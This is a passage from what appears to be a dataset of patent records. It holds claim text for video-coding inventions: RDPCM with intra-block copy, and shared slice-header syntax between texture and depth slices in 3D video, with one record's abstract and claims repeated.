obtaining, from an encoded bitstream, a displacement vector that indicates a location of the prediction block in the picture; and locating the prediction block of the picture using the displacement vector. 8. The method of claim 1, wherein generating the residual block further comprises applying inverse quantization to the residual block in a lossy decoding process. 9. The method of claim 1, wherein generating the residual block comprises generating the residual block without performing inverse quantization in a lossless decoding process. 10. The method of claim 1, further comprising decoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the step of generating the residual block of the picture based on the predicted residual block. 11. The method of claim 10, wherein decoding the one or more syntax elements comprises decoding the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 12. The method of claim 10, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 13. A method of encoding video data, the method comprising:
generating a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture; generating a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and encoding data that represents the predicted residual block in a bitstream. 14. The method of claim 13, wherein generating the predicted residual block comprises applying residual differential pulse code modulation (RDPCM) to the residual block. 15. The method of claim 14, wherein applying the RDPCM to the residual block comprises applying horizontal RDPCM to the one or more residual values. 16. The method of claim 14, wherein applying the RDPCM to the predicted residual block comprises applying vertical RDPCM to the one or more residual values. 17. The method of claim 14, wherein applying the RDPCM comprises selecting an RDPCM mode from a plurality of RDPCM modes and applying the selected RDPCM mode, the method further comprising encoding data that indicates the selected RDPCM mode. 18. The method of claim 17, wherein encoding data that indicates the selected RDPCM mode comprises encoding data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 19. The method of claim 13, wherein generating the residual block comprises applying an intra-block copying (intra-BC) process to generate the residual block, wherein applying the intra-BC process comprises determining a region of the picture from which to select the prediction block, and determining a displacement vector that identifies the prediction block, the method further comprising encoding data that represents the displacement vector. 20. The method of claim 13, wherein encoding the data comprises applying quantization to the predicted residual block in a lossy encoding process. 21. 
The method of claim 13, wherein encoding the data comprises encoding the data without applying quantization to the predicted residual in a lossless encoding process. 22. The method of claim 13, further comprising encoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the step of generating the predicted residual block. 23. The method of claim 22, wherein encoding the one or more syntax elements comprises encoding the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 24. The method of claim 22, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. 25. A device for decoding video data, the device comprising:
a memory configured to store the video data; and a video decoder configured to:
generate a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and
generate a current block of the picture based on a combination of the residual block and a prediction block of the picture. 26. The device of claim 25, wherein the video decoder is further configured to obtain the predicted residual block from an encoded bitstream, and wherein to generate the residual block, the video decoder is configured to apply residual differential pulse code modulation (RDPCM) to the predicted residual block. 27. The device of claim 26, wherein to apply the RDPCM to the predicted residual block, the video decoder is configured to apply horizontal RDPCM to the one or more predicted residual values. 28. The device of claim 26, wherein to apply the RDPCM to the predicted residual block, the video decoder is configured to apply vertical RDPCM to the one or more predicted residual values. 29. The device of claim 26, wherein to apply the RDPCM, the video decoder is configured to obtain, from the encoded bitstream, data that indicates an RDPCM mode from a plurality of RDPCM modes and applying the indicated RDPCM mode. 30. The device of claim 29, wherein to obtain the data that indicates an RDPCM mode, the video decoder is configured to obtain data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 31. The device of claim 25, wherein the video decoder is further configured to:
obtain, from an encoded bitstream, a displacement vector that indicates a location of the prediction block in the picture; and locate the prediction block of the picture using the displacement vector. 32. The device of claim 25, wherein to generate the residual block, the video decoder is configured to apply inverse quantization to the residual block in a lossy decoding process. 33. The device of claim 25, wherein to generate the residual block, the video decoder is configured to generate the residual block without performing inverse quantization in a lossless decoding process. 34. The device of claim 25, wherein the video decoder is further configured to decode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the residual block of the picture based on the predicted residual block. 35. The device of claim 34, wherein to decode the one or more syntax elements, the video decoder is configured to decode the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 36. The device of claim 34, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 37. The device of claim 25, further comprising a display configured to display the current block of the picture. 38. A device for encoding video data, the device comprising:
a memory configured to store the video data; and a video encoder configured to:
generate a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture;
generate a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and
encode data that represents the predicted residual block in a bitstream. 39. The device of claim 38, wherein to generate the predicted residual block, the video encoder is configured to apply residual differential pulse code modulation (RDPCM) to the residual block. 40. The device of claim 39, wherein to apply the RDPCM to the residual block, the video encoder is configured to apply horizontal RDPCM to the one or more residual values. 41. The device of claim 39, wherein to apply the RDPCM to the predicted residual block, the video encoder is configured to apply vertical RDPCM to the one or more residual values. 42. The device of claim 39, wherein to apply the RDPCM, the video encoder is configured to select an RDPCM mode from a plurality of RDPCM modes and to apply the selected RDPCM mode, the video encoder is further configured to encode data that indicates the selected RDPCM mode. 43. The device of claim 42, wherein to encode the data that indicates the selected RDPCM mode, the video encoder is configured to encode data that indicates at least one of an RDPCM off mode, an RDPCM vertical mode, and an RDPCM horizontal mode. 44. The device of claim 38, wherein to generate the residual block, the video encoder is configured to apply an intra-block copying (intra-BC) process to generate the residual block, wherein to apply the intra-BC process, the video encoder is configured to determine a region of the picture from which to select the prediction block and to determine a displacement vector that identifies the prediction block, and wherein the video encoder is further configured to encode data that represents the displacement vector. 45. The device of claim 38, wherein to encode the data, the video encoder is configured to apply quantization to the predicted residual block in a lossy encoding process. 46. 
The device of claim 38, wherein to encode the data, the video encoder is configured to encode the data without applying quantization to the predicted residual block in a lossless encoding process. 47. The device of claim 38, wherein the video encoder is further configured to encode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the predicted residual block. 48. The device of claim 47, wherein to encode the one or more syntax elements, the video encoder is configured to encode the one or more syntax elements at a sequence level in a sequence parameter set (SPS). 49. The device of claim 47, wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. 50. The device of claim 38, further comprising a camera sensor configured to generate the current block. 51. A device for decoding video data, the device comprising:
means for generating a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and means for generating a current block of the picture based on a combination of the residual block and a prediction block of the picture. 52. The device of claim 51, further comprising means for decoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the residual block of the picture based on the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 53. A device for encoding video data, the device comprising:
means for generating a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture; means for generating a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and means for encoding data that represents the predicted residual block in a bitstream. 54. The device of claim 53, further comprising means for encoding one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. 55. A non-transitory computer-readable medium having instructions stored thereon that, when executed, cause one or more processors to:
generate a residual block of a picture based on a predicted residual block including reconstructing one or more residual values of the residual block based on one or more predicted residual values of the residual block; and generate a current block of the picture based on a combination of the residual block and a prediction block of the picture. 56. The non-transitory computer-readable medium of claim 55, wherein the instructions further cause the one or more processors to decode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the residual block of the picture based on the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an inter-prediction mode and an intra-BC prediction mode. 57. A non-transitory computer-readable medium having instructions stored thereon that, when executed, cause one or more processors to:
generate a residual block for a current block of a picture based on a difference between the current block and a prediction block of the picture; generate a predicted residual block based on the residual block by predicting one or more residual values of the residual block based on one or more other residual values of the residual block; and encode data that represents the predicted residual block in a bitstream. 58. The non-transitory computer-readable medium of claim 57, wherein the instructions further cause the one or more processors to encode one or more syntax elements that indicate whether an RDPCM process is enabled, wherein the RDPCM process includes the generating the predicted residual block, and wherein the one or more syntax elements that indicate whether the RDPCM process is enabled are applicable to an intra-BC mode and an inter-prediction mode. | 2,400 |
9,104 | 9,104 | 13,553,617 | 2,483 | In one example, a video coder is configured to code a first slice, wherein the first slice comprises one of a texture slice and a corresponding depth slice, wherein the first slice has a slice header comprising complete syntax elements representative of characteristics of the first slice. The video coder is further configured to determine common syntax elements for a second slice from the slice header of the first slice. The video coder is also configured to code the second slice after coding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. | 1. A method of processing video data, the method comprising:
receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; decoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determining common syntax elements for a second slice from the slice header of the first slice; and decoding the second slice after coding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 2. The method of claim 1, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 3. The method of claim 1, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 4. 
The method of claim 1, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 5. The method of claim 1, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 6. The method of claim 1, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 7. The method of claim 1, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, the method further comprising:
determining a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 8. The method of claim 1, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 9. The method of claim 1, further comprising:
signaling an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 10. A device for decoding data, comprising a video decoder configured to receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice, receive a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit, decode a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice, determine common syntax elements for a second slice from the slice header of the first slice, and decode the second slice after decoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 11. The device of claim 10, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 12. 
The device of claim 10, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 13. The device of claim 10, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 14. The device of claim 10, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 15. The device of claim 10, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 16. The device of claim 10, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, wherein the video decoder is further configured to determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 17. The device of claim 10, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 18. The device of claim 10, wherein the video decoder is further configured to signal an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 19. A computer program product comprising a computer-readable storage medium having stored thereon instructions that, when executed, cause a processor of a video decoding device to:
receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receive a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; decode a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determine common syntax elements for a second slice from the slice header of the first slice; and decode the second slice after decoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 20. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 21. 
The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 22. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 23. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 24. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 25. The computer-readable storage medium of claim 19, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, the instructions further cause a processor of a video decoding device to:
determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 26. A device for processing video data, comprising:
means for receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; means for receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; means for decoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; means for determining common syntax elements for a second slice from the slice header of the first slice; and means for decoding the second slice after coding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 27. The device of claim 26, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 28. A method of encoding video data, the method comprising:
receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; encoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determining common syntax elements for a second slice from the slice header of the first slice; and encoding the second slice after encoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 29. The method of claim 28, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 30. The method of claim 28, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 31. 
The method of claim 28, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 32. The method of claim 28, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 33. The method of claim 28, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 34. The method of claim 28, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, the method further comprising:
determining a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 35. The method of claim 28, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 36. The method of claim 28, further comprising:
signaling an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 37. A device for encoding data, comprising a video encoder configured to receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice, receive a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit, encode a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice, determine common syntax elements for a second slice from the slice header of the first slice, and encode the second slice after encoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 38. The device of claim 37, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 39. 
The device of claim 37, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 40. The device of claim 37, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 41. The device of claim 37, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 42. The device of claim 37, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 43. The device of claim 37, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, and wherein the video encoder is further configured to:
determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 44. The device of claim 37, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 45. The device of claim 37, wherein the video encoder is further configured to:
signal an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 46. A computer program product comprising a computer-readable storage medium having stored thereon instructions that, when executed, cause a processor of a video encoding device to:
receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receive a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; code a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determine common syntax elements for a second slice from the slice header of the first slice; and code the second slice after coding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 47. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 48. 
The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 49. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 50. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 51. The computer-readable storage medium of claim 46, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax tables, and a prediction weight table. 52. The computer-readable storage medium of claim 46, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, the instructions further cause a processor of a video encoding device to:
determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 53. A device for processing video data, comprising:
means for receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; means for receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; means for encoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; means for determining common syntax elements for a second slice from the slice header of the first slice; and means for encoding the second slice after encoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, without repeating values for syntax elements that are common to the first slice. 54. The device of claim 53, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 
| In one example, a video coder is configured to code a first slice, wherein the first slice comprises one of a texture slice and a corresponding depth slice, wherein the first slice has a slice header comprising complete syntax elements representative of characteristics of the first slice. The video coder is further configured to determine common syntax elements for a second slice from the slice header of the first slice. The video coder is also configured to code the second slice after coding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 1. A method of processing video data, the method comprising:
receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; decoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determining common syntax elements for a second slice from the slice header of the first slice; and decoding the second slice after decoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 2. The method of claim 1, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 3. The method of claim 1, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 4. 
The method of claim 1, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 5. The method of claim 1, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 6. The method of claim 1, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax table, and a prediction weight table. 7. The method of claim 1, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, the method further comprising:
determining a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 8. The method of claim 1, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 9. The method of claim 1, further comprising:
signaling an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 10. A device for decoding data, comprising a video decoder configured to receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice, receive a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit, decode a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice, determine common syntax elements for a second slice from the slice header of the first slice, and decode the second slice after decoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 11. The device of claim 10, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 12. 
The device of claim 10, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 13. The device of claim 10, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 14. The device of claim 10, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 15. The device of claim 10, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax table, and a prediction weight table. 16. The device of claim 10, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, wherein the video decoder is further configured to determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 17. The device of claim 10, wherein the slice header of the second slice comprises at least one of the syntax elements related to deblocking filter parameters or adaptive loop filtering parameters for the second slice. 18. The device of claim 10, wherein the video decoder is further configured to signal an indication of which syntax elements are explicitly signaled in the slice header of the second slice in the sequence parameter set. 19. A computer program product comprising a computer-readable storage medium having stored thereon instructions that, when executed, cause a processor of a video decoding device to:
receive a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; receive a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; decode a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; determine common syntax elements for a second slice from the slice header of the first slice; and decode the second slice after decoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 20. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least a signaled syntax element of an identification of a referring picture parameter set. 21. 
The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 22. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least a signaled syntax element of a starting position of the coded block. 23. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least one of a frame number and a picture order count of the second slice. 24. The computer-readable storage medium of claim 19, wherein the slice header of the second slice comprises at least one of the syntax elements related to a reference picture list construction, a number of active reference frames for each list, a reference picture list modification syntax table, and a prediction weight table. 25. The computer-readable storage medium of claim 19, wherein the first slice comprises the texture slice and the second slice comprises the depth slice, wherein the instructions further cause a processor of a video decoding device to:
determine a starting position of the depth slice to be zero when a starting position of the depth view component is not signaled in the texture slice header or the depth slice header. 26. A device for processing video data, comprising:
means for receiving a texture slice for a texture view component associated with one or more coded blocks of video data representative of texture information, the texture slice comprising the encoded one or more blocks and a texture slice header comprising syntax elements representative of characteristics of the texture slice; means for receiving a depth slice for a depth view component associated with one or more coded blocks of depth information corresponding to the texture view component, wherein the depth slice comprises the one or more coded blocks of depth information and a depth slice header comprising syntax elements representative of characteristics of the depth slice, and wherein the depth view component and the texture view component both belong to a view and an access unit; means for decoding a first slice, wherein the first slice comprises one of the texture slice and the depth slice, wherein the first slice has a slice header comprising syntax elements representative of characteristics of the first slice; means for determining common syntax elements for a second slice from the slice header of the first slice; and means for decoding the second slice after decoding the first slice at least partially based on the determined common syntax elements, wherein the second slice comprises one of the texture slice and the depth slice that is not the first slice, wherein the second slice has a slice header comprising syntax elements representative of characteristics of the second slice, excluding values for syntax elements that are common to the first slice. 27. The device of claim 26, wherein the slice header of the second slice comprises at least a signaled syntax element of a quantization parameter difference between a quantization parameter of the second slice and a quantization parameter signaled in a picture parameter set. 28. A method of encoding video data, the method comprising:
